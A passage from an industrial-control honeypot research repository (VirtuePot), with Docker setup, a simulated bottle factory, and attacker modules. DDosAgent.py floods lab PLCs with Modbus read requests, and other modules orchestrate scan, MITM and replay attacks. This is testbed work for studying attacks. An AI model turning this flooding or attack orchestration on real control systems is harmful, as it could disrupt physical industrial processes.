├── .gitignore
├── .gitmodules
├── README.md
├── bottlefactory
├── Dockerfile
├── docker-compose.yml
└── src
│ ├── Attacker.py
│ ├── AttackerMachine.py
│ ├── Configs.py
│ ├── DDosAgent.py
│ ├── FactorySimulation.py
│ ├── HMI1.py
│ ├── HMI2.py
│ ├── HMI3.py
│ ├── PLC1.py
│ ├── PLC2.py
│ ├── attacks
│ ├── 9.sh
│ ├── attack-logs
│ │ ├── attacker_machine_summary.csv
│ │ ├── attacker_summary.csv
│ │ ├── log-ddos.txt
│ │ ├── log-mitm-scapy.txt
│ │ ├── log-replay-scapy.txt
│ │ ├── log-scan-nmap.txt
│ │ └── log-scan-scapy.txt
│ ├── ddos.sh
│ ├── mitm-ettercap.sh
│ ├── mitm-scapy.sh
│ ├── mitm
│ │ ├── ettercap-packets.pcap
│ │ ├── mitm (copy).ecf
│ │ ├── mitm-INT-42.ecf
│ │ ├── mitm.ecf
│ │ ├── mitm.ef
│ │ └── mitm.sh
│ ├── replay-scapy.sh
│ ├── scan-ettercap.sh
│ ├── scan-nmap.sh
│ ├── scan-ping.sh
│ └── scan-scapy.sh
│ ├── ics_sim
│ ├── Device.py
│ ├── ModbusCommand.py
│ ├── ModbusPackets.py
│ ├── NetworkNode.py
│ ├── ScapyAttacker.py
│ ├── configs.py
│ ├── connectors.py
│ ├── helper.py
│ └── protocol.py
│ ├── logs
│ ├── logs-Attacker.log
│ ├── logs-AttackerMachine.log
│ ├── logs-Factory.log
│ ├── logs-HMI1.log
│ ├── logs-HMI2.log
│ ├── logs-HMI3.log
│ ├── logs-PLC1.log
│ ├── logs-PLC2.log
│ ├── snapshots_PLC1.csv
│ └── snapshots_PLC2.csv
│ ├── start.py
│ ├── start.sh
│ ├── storage
│ └── PhysicalSimulation1.sqlite
│ └── tests
│ ├── connectionTests.py
│ ├── modbusBaseTest.py
│ └── storage
│ └── PhysicalSimulation1.sqlite
├── doc
├── doc.md
├── docker.md
├── honeyd.md
├── icssim.md
├── images
│ ├── VirtuePot.png
│ └── logo.png
├── openplc.md
├── scada.md
└── zeek.md
├── honeyd
├── Dockerfile
├── docker-compose.yml
├── honeyd.conf
├── libsnap7.so
└── s7commServer
├── init.sh
├── log
├── MaliciousvsBenign.pdf
├── Modbus.pdf
├── countries_comparison.pdf
├── dest_ports.pdf
├── http_methods.pdf
├── log.ipynb
├── modbus.png
├── organization_stacked.pdf
├── organizations.pdf
├── uniqueip.pdf
├── world_cloud&vsix.pdf
├── world_cloud.pdf
└── world_vsix.pdf
├── restart_docker_containers.sh
├── scada
├── HMI.png
├── README.md
├── Water Tank.zip
├── docker-compose.yml
└── export.json
├── tcpdump_start.sh
├── tcpdump_stop.sh
├── watertank
├── README.md
├── docker-compose.yml
├── hmi
│ ├── Dockerfile
│ ├── app.py
│ ├── docker_entrypoint.sh
│ ├── gunicorn.sh
│ ├── requirements.txt
│ ├── static
│ │ ├── css
│ │ │ └── styles.css
│ │ ├── imgs
│ │ │ ├── siemens_logo.png
│ │ │ ├── tank.jpeg
│ │ │ └── user-avatar-with-check-mark.png
│ │ └── js
│ │ │ └── main.js
│ └── templates
│ │ └── index.html
├── openplc-program
│ ├── beremiz.xml
│ ├── build
│ │ ├── Config0.c
│ │ ├── Config0.h
│ │ ├── Config0.o
│ │ ├── LOCATED_VARIABLES.h
│ │ ├── POUS.c
│ │ ├── POUS.h
│ │ ├── POUS.o
│ │ ├── Res0.c
│ │ ├── Res0.o
│ │ ├── Scene_3.dynlib
│ │ ├── VARIABLES.csv
│ │ ├── beremiz.h
│ │ ├── generated_plc.st
│ │ ├── lastbuildPLC.md5
│ │ ├── plc.st
│ │ ├── plc_debugger.c
│ │ ├── plc_debugger.o
│ │ ├── plc_main.c
│ │ └── plc_main.o
│ ├── plc.xml
│ └── watertank.st
├── openplc
│ ├── Dockerfile
│ ├── PLC1.st
│ ├── Watertank.st
│ └── honeyd.conf
└── openplc_sim
│ ├── Dockerfile
│ ├── requirements.txt
│ └── tcp_modbus.py
└── zeek
├── docker-compose.yml
├── elasticsearch
├── Dockerfile
├── VERSION
├── config
│ ├── elastic
│ │ ├── elasticsearch.yml
│ │ └── log4j2.properties
│ ├── logrotate
│ └── x-pack
│ │ └── log4j2.properties
├── docker-healthcheck
├── elastic-entrypoint.sh
└── hooks
│ └── post_push
├── filebeat
├── Dockerfile
├── LATEST
├── config
│ └── filebeat.yml
├── entrypoint.sh
└── hooks
│ ├── build
│ └── post_push
├── kibana
├── Dockerfile
├── VERSION
├── config
│ ├── kibana
│ │ └── kibana.yml
│ └── logrotate
├── docker-entrypoint.sh
└── hooks
│ └── post_push
└── zeek
├── elastic
├── .dockerignore
├── Dockerfile
└── local.zeek
└── zeekctl
├── .dockerignore
├── Dockerfile
├── hooks
└── post_push
└── local.zeek
/.gitignore:
--------------------------------------------------------------------------------
1 | .DS_Store
2 | __pycache__
--------------------------------------------------------------------------------
/.gitmodules:
--------------------------------------------------------------------------------
1 | [submodule "openplc"]
2 | path = openplc
3 | url = https://github.com/thiagoralves/OpenPLC_v2
4 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
24 |
25 |
26 |
27 | ## 📇 Abstract
28 |
29 | >Industrial Control Systems (ICS) are crucial in managing and supervising a wide range of industrial activities, including those in energy, manufacturing, and transportation. However, as
30 | these systems’ interconnection and digitalization increase, new cybersecurity concerns emerge, rendering them vulnerable to cyberattacks. To address these issues, this thesis investigates using honeypots as a proactive cybersecurity tool for protecting Industrial Control Systems. A honeypot is an effective standard tool to study attacks against the industrial control system
31 | and defense methods to protect from attackers. nowadays the ICS industry faces an increasing number of cyber threats, and the attacker’s capabilities become much better It become more
32 | challenging to create a honeypot that can be capable of detecting and responding to such an attack and efficiently logging the interactions and capturing the changes in the physical process. With our proposal we aimed to learn more about the attack patterns and behavior by use of the honeypot, we can get valuable Information about the latest Tactics, Techniques, and Procedures for attacks and their technical knowledge, and abilities. In this thesis, we presented a Virtuepot honeypot that mainly focuses on the physical interac tion and design of honeypots that properly simulate the behavior and services of real PLCs using dynamic service simulations. This might include more advanced simulations of industrial processes, communication protocols, and command responses. We deployed our honeypot in both the cloud and locally on-premise in VSIX Internet Exchange Point and collected the data for 61 days. The Honeypot experiment showed that the on-premise machine attracted more realistic attacks compared to cloud deployment.
33 |
34 | Keywords: Cyber-physical system (CPS); Honeypot; Programmable Logic Controller (PLC); Industrial Control Systems (ICS); SCADA.
35 |
36 |
37 |
38 |
39 | ## 🧱 Architecture
40 | 
41 |
42 |
43 | ## ⚙️ Installation
44 |
45 | ### Prerequisites
46 |
47 | **OS requirements**
48 |
49 | To install Docker Engine, you need the 64-bit version of one of these Ubuntu versions:
50 |
51 | * Ubuntu Jammy 22.04 (LTS)
52 | * Ubuntu Focal 20.04 (LTS)
53 | * Ubuntu Bionic 18.04 (LTS)
54 |
55 | Docker Engine is compatible with x86_64 (or amd64), armhf, arm64, and s390x architectures.
56 |
57 | * [Install Docker](./doc/docker.md)
58 |
59 | In order to install the honeypot, clone this repo and execute init.sh using the command:
60 |
61 | ```bash
62 | git clone https://github.com/0xnkc/virtuepot/
63 | cd virtuepot
64 | ```
65 |
66 |
67 |
68 | ```bash
69 | chmod +x init.sh
70 |
71 | ./init.sh
72 | ```
73 |
74 | (back to top)
75 |
--------------------------------------------------------------------------------
/bottlefactory/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM ubuntu:20.04
2 |
3 | RUN apt-get update
4 |
5 | RUN DEBIAN_FRONTEND="noninteractive" apt-get -y install tzdata
6 |
7 | RUN apt-get update \
8 | && apt-get install -y sudo \
9 | && apt-get install -y python3 \
10 | && apt-get install -y iputils-ping \
11 | && apt-get install -y net-tools \
12 | && apt-get install -y git \
13 | && apt-get -y install nano \
14 | && apt --yes install python3-pip \
15 | && pip install pyModbusTCP \
16 | && apt install telnet \
17 | && apt-get install -y memcached \
18 | && apt-get install -y python3-memcache \
19 | && apt-get install -y ettercap-common \
20 | && apt-get install -y unzip \
21 | && apt-get install -y nmap \
22 | && apt-get install -y curl \
23 | && apt-get install dos2unix
24 |
25 | # RUN curl -OL https://raw.githubusercontent.com/nikhilkc96/virtuepot/main/bottlefactory/ics-docker/src.zip
26 |
27 | # RUN unzip src.zip
28 |
29 | COPY /src /src/
30 |
31 | WORKDIR /src
32 |
33 | RUN find . -type f -exec dos2unix {} \;
34 |
35 | RUN chmod 755 *.*
36 |
37 |
38 |
39 |
40 |
41 |
--------------------------------------------------------------------------------
/bottlefactory/docker-compose.yml:
--------------------------------------------------------------------------------
1 | version: "3.9"
2 | services:
3 | pys:
4 | build: .
5 | privileged: true
6 | working_dir: /src
7 | entrypoint: ["./start.sh", "FactorySimulation.py"]
8 | container_name: pys
9 | volumes:
10 | - src:/src
11 | - "/etc/timezone:/etc/timezone:ro"
12 | - "/etc/localtime:/etc/localtime:ro"
13 | ports:
14 | - 11211:11211
15 | networks:
16 | fnet:
17 | ipv4_address: 192.168.1.31
18 |
19 | plc1:
20 | build: .
21 | privileged: true
22 | working_dir: /src
23 | entrypoint: ["./start.sh", "PLC1.py"]
24 | container_name: plc1
25 | volumes:
26 | - src:/src
27 | - "/etc/timezone:/etc/timezone:ro"
28 | - "/etc/localtime:/etc/localtime:ro"
29 | ports:
30 | - 503:502
31 | networks:
32 | wnet:
33 | ipv4_address: 192.168.0.11
34 | fnet:
35 | ipv4_address: 192.168.1.11
36 |
37 |
38 | plc2:
39 | build: .
40 | #stdin_open: true # docker run -i
41 | #tty: true
42 | privileged: true
43 | working_dir: /src
44 | entrypoint: ["./start.sh", "PLC2.py"]
45 | container_name: plc2
46 | volumes:
47 | - src:/src
48 | - "/etc/timezone:/etc/timezone:ro"
49 | - "/etc/localtime:/etc/localtime:ro"
50 | ports:
51 | - 504:502
52 | networks:
53 | wnet:
54 | ipv4_address: 192.168.0.12
55 | fnet:
56 | ipv4_address: 192.168.1.12
57 |
58 | hmi1:
59 | build: .
60 | stdin_open: true # docker run -i
61 | tty: true
62 | working_dir: /src
63 | privileged: true
64 | entrypoint: ["./start.sh", "HMI1.py"]
65 | container_name: hmi1
66 | volumes:
67 | - src:/src
68 | - "/etc/timezone:/etc/timezone:ro"
69 | - "/etc/localtime:/etc/localtime:ro"
70 | networks:
71 | wnet:
72 | ipv4_address: 192.168.0.21
73 |
74 | hmi2:
75 | build: .
76 | stdin_open: true # docker run -i
77 | tty: true
78 | privileged: true
79 | working_dir: /src
80 | entrypoint: ["./start.sh", "HMI2.py"]
81 | container_name: hmi2
82 | volumes:
83 | - src:/src
84 | networks:
85 | wnet:
86 | ipv4_address: 192.168.0.22
87 |
88 |
89 | hmi3:
90 | build: .
91 | stdin_open: true # docker run -i
92 | tty: true
93 | privileged: true
94 | working_dir: /src
95 | entrypoint: ["./start.sh", "HMI3.py"]
96 | container_name: hmi3
97 | volumes:
98 | - src:/src
99 | - "/etc/timezone:/etc/timezone:ro"
100 | - "/etc/localtime:/etc/localtime:ro"
101 | networks:
102 | wnet:
103 | ipv4_address: 192.168.0.23
104 |
105 | networks:
106 | wnet:
107 | driver: bridge
108 | name: icsnet
109 | ipam:
110 | config:
111 | - subnet: 192.168.0.0/24
112 | gateway: 192.168.0.1
113 | driver_opts:
114 | com.docker.network.bridge.name: br_icsnet
115 | fnet:
116 | driver: bridge
117 | name: phynet
118 | ipam:
119 | config:
120 | - subnet: 192.168.1.0/24
121 | gateway: 192.168.1.1
122 | driver_opts:
123 | com.docker.network.bridge.name: br_phynet
124 |
125 |
126 | volumes:
127 | src:
--------------------------------------------------------------------------------
/bottlefactory/src/Attacker.py:
--------------------------------------------------------------------------------
1 | import logging
2 | import os
3 | import subprocess
4 | import sys
5 | from datetime import datetime, timedelta
6 | from time import sleep
7 |
8 | from scapy.arch import get_if_addr
9 | from scapy.config import conf
10 | from scapy.layers.inet import IP
11 | from scapy.layers.l2 import ARP, Ether
12 |
13 | from ics_sim.Device import Runnable, HMI
14 |
15 |
16 | class Attacker(Runnable):
17 | def __init__(self):
18 | Runnable.__init__(self, 'Attacker', 100)
19 |
20 | def _before_start(self):
21 | Runnable._before_start(self)
22 | self.__attack_path = './attacks'
23 | self.__log_path = os.path.join(self.__attack_path,'attack-logs')
24 |
25 | self.MAC = Ether().src
26 | self.IP = get_if_addr(conf.iface)
27 |
28 | if not os.path.exists(self.__log_path):
29 | os.makedirs(self.__log_path)
30 |
31 | self.__log_attack_summary = self.setup_logger(
32 | "attacker_summary",
33 | logging.Formatter('%(message)s'),
34 | file_dir= self.__log_path,
35 | file_ext='.csv'
36 | )
37 |
38 | self.__log_attack_summary.info("{},{},{},{},{},{},{},{}".format("attack",
39 | "startStamp",
40 | "endStamp",
41 | "startTime",
42 | "endTime",
43 | "attackerMAC",
44 | "attackerIP",
45 | "description"
46 | )
47 | )
48 |
49 | self.__attack_list = {'scan-ettercap': 'ip-scan',
50 | 'scan-ping': 'ip-scan',
51 | 'scan-nmap': 'port-scan',
52 | 'scan-scapy': 'ip-scan',
53 | 'mitm-scapy': 'mitm',
54 | 'mitm-ettercap': 'mitm',
55 | 'ddos': 'ddos',
56 | 'replay-scapy': 'replay'}
57 |
58 | self.__attack_cnt = len(self.__attack_list)
59 |
60 | pass
61 |
62 | def __get_menu_line(self, template, number, text):
63 | return template.format(
64 | self._make_text(str(number)+')', self.COLOR_BLUE),
65 | self._make_text(text, self.COLOR_YELLOW),
66 | self._make_text(str(number), self.COLOR_BLUE)
67 | )
68 |
69 | def _logic(self):
70 | menu = "\n"
71 | menu += self.__get_menu_line('{} to {} press {} \n', 0, 'clear')
72 | i = 0
73 | for attack in self.__attack_list.keys():
74 | i += 1
75 | menu += self.__get_menu_line('{} To apply the {} attack press {} \n', i , attack)
76 | self.report(menu)
77 |
78 | try:
79 | attack_name = int(input('your choice (1 to {}): '.format(self.__attack_cnt)))
80 |
81 | if int(attack_name) == 0:
82 | os.system('clear')
83 | return
84 |
85 | if 0 < attack_name <= self.__attack_cnt:
86 | attack_name = list(self.__attack_list.keys())[attack_name-1]
87 | attack_short_name = self.__attack_list[attack_name]
88 |
89 |
90 | attack_path = os.path.join(self.__attack_path, str(attack_name) + ".sh")
91 |
92 | if not os.path.isfile(attack_path):
93 | raise ValueError('command {} does not exist'.format(attack_path))
94 |
95 | self.report('running ' + attack_path)
96 | log_file = os.path.join(self.__log_path,"log-{}.txt".format(attack_name))
97 | start_time = datetime.now()
98 | subprocess.run([attack_path, self.__log_path, log_file])
99 | end_time = datetime.now()
100 |
101 | if attack_name == 'ddos':
102 | start_time = start_time + timedelta(seconds=5)
103 |
104 | self.__log_attack_summary.info("{},{},{},{},{},{},{},{}".format(attack_short_name,
105 | start_time.timestamp(),
106 | end_time.timestamp(),
107 | start_time,
108 | end_time,
109 | self.MAC,
110 | self.IP,
111 | attack_name,
112 | )
113 | )
114 |
115 |
116 |
117 |
118 | except ValueError as e:
119 | self.report(e.__str__())
120 |
121 | except Exception as e:
122 | self.report('The input is invalid ' + e.__str__())
123 |
124 | input('press inter to continue ...')
125 |
126 |
127 | if __name__ == '__main__':
128 | attacker = Attacker()
129 | attacker.start()
130 |
--------------------------------------------------------------------------------
/bottlefactory/src/AttackerMachine.py:
--------------------------------------------------------------------------------
1 | import logging
2 | import os
3 | import random
4 | import subprocess
5 | from datetime import datetime, timedelta
6 | from time import sleep
7 |
8 | from scapy.arch import get_if_addr
9 | from scapy.config import conf
10 | from scapy.layers.l2 import Ether
11 |
12 | from ics_sim.Device import Runnable
13 |
14 |
15 | class AttackerMachine(Runnable):
16 | def __init__(self):
17 | Runnable.__init__(self, 'AttackerMachine', 100)
18 |
19 | def _before_start(self):
20 | Runnable._before_start(self)
21 |
22 | self.__attack_path = './attacks'
23 | self.__log_path = os.path.join(self.__attack_path, 'attack-logs')
24 |
25 | self.MAC = Ether().src
26 | self.IP = get_if_addr(conf.iface)
27 |
28 | if not os.path.exists(self.__log_path):
29 | os.makedirs(self.__log_path)
30 |
31 | self.__log_attack_summary = self.setup_logger(
32 | "attacker_machine_summary",
33 | logging.Formatter('%(message)s'),
34 | file_dir=self.__log_path,
35 | file_ext='.csv'
36 | )
37 |
38 | self.__log_attack_summary.info("{},{},{},{},{},{},{},{}".format("attack",
39 | "startStamp",
40 | "endStamp",
41 | "startTime",
42 | "endTime",
43 | "attackerMAC",
44 | "attackerIP",
45 | "description"
46 | )
47 | )
48 |
49 | self.__attack_list = {'scan-ettercap': 'ip-scan',
50 | 'scan-ping': 'ip-scan',
51 | 'scan-nmap': 'port-scan',
52 | 'scan-scapy': 'ip-scan',
53 | 'mitm-scapy': 'mitm',
54 | 'mitm-ettercap': 'mitm',
55 | 'ddos': 'ddos',
56 | 'replay-scapy': 'replay'}
57 |
58 | self.__attack_scenario = []
59 | self.__attack_scenario += ['scan-ettercap'] * 0 # this should be 0, cannot automate
60 | self.__attack_scenario += ['scan-ping'] * 0
61 | self.__attack_scenario += ['scan-nmap'] * 16
62 | self.__attack_scenario += ['scan-scapy'] * 21
63 | self.__attack_scenario += ['mitm-scapy'] * 14
64 | self.__attack_scenario += ['mitm-ettercap'] * 0
65 | self.__attack_scenario += ['ddos'] * 7
66 | self.__attack_scenario += ['replay-scapy'] * 7
67 |
68 | random.shuffle(self.__attack_scenario)
69 |
70 | self.__attack_cnt = len(self.__attack_list)
71 |
72 | def _logic(self):
73 | while True:
74 | response = input("Do you want to start attacks? \n")
75 | response = response.lower()
76 | if response == 'y' or response == 'yes':
77 | self._set_clear_scr(False)
78 | break
79 | else:
80 | continue
81 |
82 | self.report('Attacker Machine start to apply {} attacks'.format(len(self.__attack_scenario)))
83 | self.__status_board = {}
84 |
85 | for attack_name in self.__attack_scenario:
86 | try:
87 | attack_short_name = self.__attack_list[attack_name]
88 | attack_path = os.path.join(self.__attack_path, str(attack_name) + ".sh")
89 |
90 | if not self.__status_board.keys().__contains__(attack_name):
91 | self.__status_board[attack_name] = 0
92 | self.__status_board[attack_name] += 1
93 |
94 | if not os.path.isfile(attack_path):
95 | raise ValueError('command {} does not exist'.format(attack_path))
96 |
97 | self.report(self._make_text('running ' + attack_path, self.COLOR_YELLOW))
98 | log_file = os.path.join(self.__log_path, "log-{}.txt".format(attack_name))
99 | start_time = datetime.now()
100 | subprocess.run([attack_path, self.__log_path, log_file])
101 | end_time = datetime.now()
102 |
103 | if attack_name == 'ddos':
104 | start_time = start_time + timedelta(seconds=5)
105 |
106 | self.__log_attack_summary.info("{},{},{},{},{},{},{},{}".format(attack_short_name,
107 | start_time.timestamp(),
108 | end_time.timestamp(),
109 | start_time,
110 | end_time,
111 | self.MAC,
112 | self.IP,
113 | attack_name,
114 | )
115 | )
116 | for attack in self.__status_board.keys():
117 | text = '{}: applied {} times'.format(attack, self.__status_board[attack])
118 | self.report(self._make_text(text, self.COLOR_GREEN))
119 |
120 | self.report('waiting 40 seconds')
121 | sleep(40)
122 |
123 | except ValueError as e:
124 | self.report(e.__str__())
125 |
126 | except Exception as e:
127 | self.report('The input is invalid ' + e.__str__())
128 |
129 | input('press inter to continue ...')
130 |
131 |
132 | if __name__ == '__main__':
133 | attackerMachine = AttackerMachine()
134 | attackerMachine.start()
135 |
--------------------------------------------------------------------------------
/bottlefactory/src/Configs.py:
--------------------------------------------------------------------------------
1 | class SimulationConfig:
2 | # Constants
3 | EXECUTION_MODE_LOCAL = 'local'
4 | EXECUTION_MODE_DOCKER = 'docker'
5 | EXECUTION_MODE_GNS3 = 'gns3'
6 |
7 | # configurable
8 | EXECUTION_MODE = EXECUTION_MODE_DOCKER
9 |
10 |
11 |
12 | class PHYSICS:
13 | TANK_LEVEL_CAPACITY = 3 # Liter
14 | TANK_MAX_LEVEL = 10
15 | TANK_INPUT_FLOW_RATE = 0.0002 # Liter/mil-second
16 | TANK_OUTPUT_FLOW_RATE = 0.0001 # Liter/mil-second
17 |
18 | BOTTLE_LEVEL_CAPACITY = 0.75 # Liter
19 | BOTTLE_MAX_LEVEL = 2
20 | BOTTLE_DISTANCE = 20 # Centimeter
21 |
22 | CONVEYOR_BELT_SPEED = 0.005 # Centimeter/mil-second
23 |
24 |
25 | class TAG:
26 | TAG_TANK_INPUT_VALVE_STATUS = 'tank_input_valve_status'
27 | TAG_TANK_INPUT_VALVE_MODE = 'tank_input_valve_mode'
28 |
29 | TAG_TANK_LEVEL_VALUE = 'tank_level_value'
30 | TAG_TANK_LEVEL_MAX = 'tank_level_max'
31 | TAG_TANK_LEVEL_MIN = 'tank_level_min'
32 |
33 | TAG_TANK_OUTPUT_VALVE_STATUS = 'tank_output_valve_status'
34 | TAG_TANK_OUTPUT_VALVE_MODE = 'tank_output_valve_mode'
35 |
36 | TAG_TANK_OUTPUT_FLOW_VALUE = 'tank_output_flow_value'
37 |
38 | TAG_CONVEYOR_BELT_ENGINE_STATUS= 'conveyor_belt_engine_status'
39 | TAG_CONVEYOR_BELT_ENGINE_MODE = 'conveyor_belt_engine_mode'
40 |
41 | TAG_BOTTLE_LEVEL_VALUE = 'bottle_level_value'
42 | TAG_BOTTLE_LEVEL_MAX = 'bottle_level_max'
43 |
44 | TAG_BOTTLE_DISTANCE_TO_FILLER_VALUE = 'bottle_distance_to_filler_value'
45 |
46 | TAG_LIST = {
47 | # tag_name (tag_id, PLC number, input/output, fault (just for inputs)
48 | TAG_TANK_INPUT_VALVE_STATUS: {'id': 0, 'plc': 1, 'type': 'output', 'fault': 0.0, 'default': 1},
49 | TAG_TANK_INPUT_VALVE_MODE: {'id': 1, 'plc': 1, 'type': 'output', 'fault': 0.0, 'default': 3},
50 |
51 | TAG_TANK_LEVEL_VALUE: {'id': 2, 'plc': 1, 'type': 'input', 'fault': 0.0, 'default': 5.8},
52 | TAG_TANK_LEVEL_MIN: {'id': 3, 'plc': 1, 'type': 'output', 'fault': 0.0, 'default': 3},
53 | TAG_TANK_LEVEL_MAX: {'id': 4, 'plc': 1, 'type': 'output', 'fault': 0.0, 'default': 7},
54 |
55 |
56 | TAG_TANK_OUTPUT_VALVE_STATUS: {'id': 5, 'plc': 1, 'type': 'output', 'fault': 0.0, 'default': 0},
57 | TAG_TANK_OUTPUT_VALVE_MODE: {'id': 6, 'plc': 1, 'type': 'output', 'fault': 0.0, 'default': 3},
58 |
59 | TAG_TANK_OUTPUT_FLOW_VALUE: {'id': 7, 'plc': 1, 'type': 'input', 'fault': 0.0, 'default': 0},
60 |
61 | TAG_CONVEYOR_BELT_ENGINE_STATUS: {'id': 8, 'plc': 2, 'type': 'output', 'fault': 0.0, 'default': 0},
62 | TAG_CONVEYOR_BELT_ENGINE_MODE: {'id': 9, 'plc': 2, 'type': 'output', 'fault': 0.0, 'default': 3},
63 |
64 | TAG_BOTTLE_LEVEL_VALUE: {'id': 10, 'plc': 2, 'type': 'input', 'fault': 0.0, 'default': 0},
65 | TAG_BOTTLE_LEVEL_MAX: {'id': 11, 'plc': 2, 'type': 'output', 'fault': 0.0, 'default': 1.8},
66 |
67 | TAG_BOTTLE_DISTANCE_TO_FILLER_VALUE: {'id': 12, 'plc': 2, 'type': 'input', 'fault': 0.0, 'default': 0},
68 | }
69 |
70 |
71 | class Controllers:
72 | PLC_CONFIG = {
73 | SimulationConfig.EXECUTION_MODE_DOCKER: {
74 | 1: {
75 | 'name': 'PLC1',
76 | 'ip': '192.168.0.11',
77 | 'port': 502,
78 | 'protocol': 'ModbusWriteRequest-TCP'
79 | },
80 | 2: {
81 | 'name': 'PLC2',
82 | 'ip': '192.168.0.12',
83 | 'port': 502,
84 | 'protocol': 'ModbusWriteRequest-TCP'
85 | },
86 | },
87 | SimulationConfig.EXECUTION_MODE_GNS3: {
88 | 1: {
89 | 'name': 'PLC1',
90 | 'ip': '192.168.0.11',
91 | 'port': 502,
92 | 'protocol': 'ModbusWriteRequest-TCP'
93 | },
94 | 2: {
95 | 'name': 'PLC2',
96 | 'ip': '192.168.0.12',
97 | 'port': 502,
98 | 'protocol': 'ModbusWriteRequest-TCP'
99 | },
100 | },
101 | SimulationConfig.EXECUTION_MODE_LOCAL: {
102 | 1: {
103 | 'name': 'PLC1',
104 | 'ip': '127.0.0.1',
105 | 'port': 5502,
106 | 'protocol': 'ModbusWriteRequest-TCP'
107 | },
108 | 2: {
109 | 'name': 'PLC2',
110 | 'ip': '127.0.0.1',
111 | 'port': 5503,
112 | 'protocol': 'ModbusWriteRequest-TCP'
113 | },
114 | }
115 | }
116 |
117 | PLCs = PLC_CONFIG[SimulationConfig.EXECUTION_MODE]
118 |
119 |
120 | class Connection:
121 | SQLITE_CONNECTION = {
122 | 'type': 'sqlite',
123 | 'path': 'storage/PhysicalSimulation1.sqlite',
124 | 'name': 'fp_table',
125 | }
126 | MEMCACHE_DOCKER_CONNECTION = {
127 | 'type': 'memcache',
128 | 'path': '192.168.1.31:11211',
129 | 'name': 'fp_table',
130 | }
131 | MEMCACHE_LOCAL_CONNECTION = {
132 | 'type': 'memcache',
133 | 'path': '127.0.0.1:11211',
134 | 'name': 'fp_table',
135 | }
136 | File_CONNECTION = {
137 | 'type': 'file',
138 | 'path': 'storage/sensors_actuators.json',
139 | 'name': 'fake_name',
140 | }
141 |
142 | CONNECTION_CONFIG = {
143 | SimulationConfig.EXECUTION_MODE_GNS3: MEMCACHE_DOCKER_CONNECTION,
144 | SimulationConfig.EXECUTION_MODE_DOCKER: SQLITE_CONNECTION,
145 | SimulationConfig.EXECUTION_MODE_LOCAL: SQLITE_CONNECTION
146 | }
147 | CONNECTION = CONNECTION_CONFIG[SimulationConfig.EXECUTION_MODE]
148 |
149 |
--------------------------------------------------------------------------------
/bottlefactory/src/DDosAgent.py:
--------------------------------------------------------------------------------
1 | import logging
2 | import os
3 | import random
4 | import sys
5 | from datetime import datetime
6 | from time import sleep
7 |
8 | from ics_sim.Device import HMI
9 | from Configs import TAG, Controllers
10 |
11 |
12 | class DDosAgent(HMI):
13 | max = 0
14 |
15 | def __init__(self, name, is_first):
16 | self.is_first = is_first
17 | super().__init__(name, TAG.TAG_LIST, Controllers.PLCs, 1)
18 | self.__counter = 0
19 | self.__target = random.choice(list(TAG.TAG_LIST.keys()))
20 | self.chunk = 10
21 |
22 |
23 | def _before_start(self):
24 | self._set_clear_scr(False)
25 | sleep(5)
26 |
27 | def _logic(self):
28 |
29 | try:
30 | for i in range(self.chunk):
31 | value = self._receive(self.__target)
32 | self.__counter += self.chunk
33 |
34 | except Exception as e:
35 | self.report('get exception on read request {}'.format(self.name(), self.__counter), logging.INFO)
36 |
37 | def _post_logic_update(self):
38 | latency = self.get_logic_execution_time() / self.chunk
39 | if latency > DDosAgent.max:
40 | DDosAgent.max = latency
41 | #self.report('Max seen latency reached to {}'.format(DDosAgent.max), logging.INFO)
42 | if self.__counter % 1000 < self.chunk:
43 | self.report('{} sent {} read request for {} '.format(self.name(), self.__counter, self.__target, ), logging.INFO)
44 |
45 | def _initialize_logger(self):
46 | if self.is_first:
47 | self._logger = self.setup_logger(
48 | "log-ddos",
49 | logging.Formatter('%(asctime)s %(levelname)s %(message)s'),
50 | file_dir= "./attacks/attack-logs",
51 | file_ext='.txt',
52 | write_mode='a',
53 | level=logging.INFO
54 | )
55 | else:
56 | self._logger = logging.getLogger('log-ddos')
57 |
58 | def _before_stop(self):
59 | self.report("sent {} massages before stop max latency is {}".format(self.__counter, DDosAgent.max))
60 |
61 |
62 | if __name__ == '__main__':
63 | name_prefix = ''
64 | if len(sys.argv) > 0:
65 | name_prefix = sys.argv[1]
66 |
67 | attackers_count = 70
68 | attacker_list = []
69 | for i in range(attackers_count):
70 | attacker_list.append(DDosAgent('DDoS1_Agent_' + name_prefix + str(i), i==0))
71 |
72 | for attacker in attacker_list:
73 | attacker.start()
74 |
75 | sleep(60)
76 |
77 | for attacker in attacker_list:
78 | attacker.stop()
79 |
80 |
81 |
82 |
--------------------------------------------------------------------------------
/bottlefactory/src/FactorySimulation.py:
--------------------------------------------------------------------------------
1 | import logging
2 |
3 | from ics_sim.Device import HIL
4 | from Configs import TAG, PHYSICS, Connection
5 |
6 |
7 | class FactorySimulation(HIL):
8 | def __init__(self):
9 | super().__init__('Factory', Connection.CONNECTION, 100)
10 | self.init()
11 |
12 | def _logic(self):
13 | elapsed_time = self._current_loop_time - self._last_loop_time
14 |
15 | # update tank water level
16 | tank_water_amount = self._get(TAG.TAG_TANK_LEVEL_VALUE) * PHYSICS.TANK_LEVEL_CAPACITY
17 | if self._get(TAG.TAG_TANK_INPUT_VALVE_STATUS):
18 | tank_water_amount += PHYSICS.TANK_INPUT_FLOW_RATE * elapsed_time
19 |
20 | if self._get(TAG.TAG_TANK_OUTPUT_VALVE_STATUS):
21 | tank_water_amount -= PHYSICS.TANK_OUTPUT_FLOW_RATE * elapsed_time
22 |
23 | tank_water_level = tank_water_amount / PHYSICS.TANK_LEVEL_CAPACITY
24 |
25 | if tank_water_level > PHYSICS.TANK_MAX_LEVEL:
26 | tank_water_level = PHYSICS.TANK_MAX_LEVEL
27 | self.report('tank water overflowed', logging.WARNING)
28 | elif tank_water_level <= 0:
29 | tank_water_level = 0
30 | self.report('tank water is empty', logging.WARNING)
31 |
32 | # update tank water flow
33 | tank_water_flow = 0
34 | if self._get(TAG.TAG_TANK_OUTPUT_VALVE_STATUS) and tank_water_amount > 0:
35 | tank_water_flow = PHYSICS.TANK_OUTPUT_FLOW_RATE
36 |
37 | # update bottle water
38 | if self._get(TAG.TAG_BOTTLE_DISTANCE_TO_FILLER_VALUE) > 1:
39 | bottle_water_amount = 0
40 | if self._get(TAG.TAG_TANK_OUTPUT_FLOW_VALUE):
41 | self.report('water is wasting', logging.WARNING)
42 | else:
43 | bottle_water_amount = self._get(TAG.TAG_BOTTLE_LEVEL_VALUE) * PHYSICS.BOTTLE_LEVEL_CAPACITY
